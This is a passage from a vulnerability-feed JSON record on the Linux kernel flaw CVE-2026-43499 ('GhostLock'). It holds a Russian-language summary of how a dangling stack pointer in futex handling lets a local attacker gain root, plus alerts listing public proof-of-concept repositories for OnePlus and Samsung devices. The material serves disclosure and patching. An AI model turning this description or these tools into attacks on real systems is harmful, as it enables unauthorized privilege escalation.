\u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u044f\u0434\u0440\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u0432\u0438\u0441\u044f\u0447\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 \u043f\u0430\u043c\u044f\u0442\u044c \u0432 \u0441\u0442\u0435\u043a\u0435 \u043f\u043e\u0442\u043e\u043a\u0430 \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u044d\u0442\u0430 \u043f\u0430\u043c\u044f\u0442\u044c \u043f\u0435\u0440\u0435\u0441\u0442\u0430\u0435\u0442 \u0431\u044b\u0442\u044c \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439.\n\n\u0417\u0430\u0442\u0435\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043e\u0441\u0432\u043e\u0431\u043e\u0434\u0438\u0442\u044c \u044d\u0442\u0443 \u043f\u0430\u043c\u044f\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0432 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u044f\u0434\u0440\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root.\n\n\u0425\u043e\u0442\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 Nebula Security \u043e\u0441\u043d\u043e\u0432\u0430\u043d \u043d\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043f\u0435\u0440\u0435\u0434\u043e\u0432\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u0430\u0445 \u043e\u0431\u0445\u043e\u0434\u0430 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b \u044f\u0434\u0440\u0430 \u0438 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430, \u043b\u0435\u0436\u0430\u0449\u0430\u044f \u0432 \u0435\u0433\u043e \u043e\u0441\u043d\u043e\u0432\u0435 \u043e\u0448\u0438\u0431\u043a\u0430 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u0430.\n\n\u0412\u0441\u043f\u043e\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u0430\u044f \u0434\u043b\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0443\u0442\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u043f\u043e\u0437\u0436\u0435 \u0431\u044b\u043b\u0430 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0434\u0440\u0443\u0433\u043e\u043c, \u0433\u0434\u0435 \u043e\u043d\u0430 \u043e\u0448\u0438\u0431\u043e\u0447\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u043b\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0435\u0433\u043e\u0441\u044f \u043f\u043e\u0442\u043e\u043a\u0430 \u0432\u043c\u0435\u0441\u0442\u043e \u043f\u043e\u0442\u043e\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u043b \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0439 \u043e\u0431\u044a\u0435\u043a\u0442 \u044f\u0434\u0440\u0430.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 GhostLock \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0442\u0441\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438, \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u043b\u0438 \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u044b\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u044f\u0434\u0440\u0430.\n\n\u0421\u0438\u0441\u0442\u0435\u043c\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u0430, \u0435\u0441\u043b\u0438 \u0432 \u043d\u0435\u0439 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 CONFIG_FUTEX_PI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u043c \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u044b\u0445 \u044f\u0434\u0435\u0440 Linux.\n\n\u041e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430 Linux \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0438 18 \u0430\u043f\u0440\u0435\u043b\u044f 2026 \u0433\u043e\u0434\u0430 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c. \u0414\u0440\u0443\u0433\u043e\u0439 \u043f\u0430\u0442\u0447, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0431\u044b\u043b \u043f\u0440\u0438\u043d\u044f\u0442 \u0434\u0432\u0430 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f, \u0438 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u044f\u0434\u0440\u0430.\n\nGoogle \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0443\u0447\u0430\u0441\u0442\u0438\u0435 Nebula Security \u0432 kernelCTF 30 \u0438\u044e\u043d\u044f, \u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0441\u0432\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043e\u0442\u0447\u0435\u0442 \u043f\u043e\u0441\u043b\u0435 \u0441\u043a\u043e\u043e\u0440\u0434\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n\n\u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u044f\u0434\u0440\u043e \u043e\u0447\u0438\u0449\u0430\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0438 \u0434\u043b\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u0434\u0430\u0447\u0438 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u00ab\u0432\u0438\u0441\u044f\u0447\u0438\u0439\u00bb \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442.\n\nNebula Security \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0438\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0437\u0430\u0449\u0438\u0442\u044b, \u043a\u0430\u043a RANDOMIZE_KSTACK_OFFSET, \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043d\u0438\u0436\u0430\u0435\u0442 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0441\u0442\u044c \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0435\u044e \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0445\u043e\u0442\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u044f\u0434\u0440\u0430 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u043f\u043e\u043b\u043d\u044b\u043c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0437\u0430\u0449\u0438\u0442\u044b.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c Linux \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u0438\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u043c, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u043d\u0438 \u0441\u0442\u0430\u043d\u0443\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 GhostLock \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435 \u044f\u0434\u0440\u0430 \u0432 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0438 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u043c\u0438 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2026-07-18T00:00:32.174288Z"}, {"uuid": "6b013563-5f5a-4bdf-a040-9b46b79e704a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/Ptfoq-36JIr04842aRlYyiRH2eHGSh16yRBc9X59r84iQ6U", "content": "", "creation_timestamp": "2026-07-18T00:00:42.557561Z"}, {"uuid": "e6873093-92a7-4098-ba69-036d0ba22f96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-18T00:00:41.220488Z"}, {"uuid": "1bc40d9c-f852-4526-b5e7-ab7fed441183", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/tYmsElsn9h--aUiAjXnDcQx9kxldzvlWhq7A7UpXPwomXD0", "content": "", "creation_timestamp": "2026-07-18T00:00:45.663189Z"}, {"uuid": "85c95cbb-7107-4be7-a5bf-9c4c7f4406a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/LBqrNkVY4dEwnjUy7Kq7g-cCM4l6IBHTiJls5F94h7vNHE8", "content": "", "creation_timestamp": "2026-07-18T02:00:05.361734Z"}, {"uuid": "e9e874ec-b541-48b6-813f-94ad6c841b7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93945", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #\u6f0f\u6d1e #\u5229\u7528\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a GhostLock-for-OnePlus\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a p2p3p\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-18 05:59:16\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\uff08CVE-2026-43499\uff09\u5185\u6838\u6f0f\u6d1e\u5229\u7528\u7a0b\u5e8f\uff0c\u9002\u7528\u4e8e\u5df2\u9501\u5b9a Bootloader \u7684\u4e00\u52a0\u8bbe\u5907\u3002\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-18T07:00:04.384750Z"}, {"uuid": "8115e5ad-74aa-4957-bf42-5ccee7bcc8fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/GithubRedTeam/93964", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a smt878u-ionstack-poc\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Wtrwx\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-18 08:20:39\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43499 (IonStack/GhostLock) pure-C re-root POC for Samsung SM-T878U / gts7l (T878USQS8DXE1)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-18T10:00:04.666199Z"}]}